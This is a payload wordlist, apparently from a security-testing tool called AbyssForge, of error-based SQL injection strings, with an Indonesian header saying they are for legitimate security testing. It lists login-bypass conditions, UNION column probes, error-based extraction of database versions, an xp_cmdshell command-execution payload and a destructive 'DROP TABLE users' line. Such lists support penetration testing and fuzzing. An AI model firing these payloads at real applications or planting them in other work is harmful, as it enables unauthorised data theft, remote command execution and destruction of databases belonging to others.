# AbyssForge - SQLi Error-based Payloads
# Untuk digunakan dalam pengujian keamanan yang sah

'
''
`
')
'))
'--
'-- -
' OR '1'='1
' OR '1'='1'--
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1'--
') OR ('1'='1
" OR "1"="1
" OR "1"="1"--
") OR ("1"="1
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1 ORDER BY 1
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
' AND 1=2 UNION SELECT 1,2,3--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,VERSION(),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
'; EXEC xp_cmdshell('ping 127.0.0.1')--
'; DROP TABLE users--
1; SELECT 1--
' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)--
AND 1=1
AND 1=2
OR 1=1
OR 1=2
1'1
\
%27
%22
%27%27
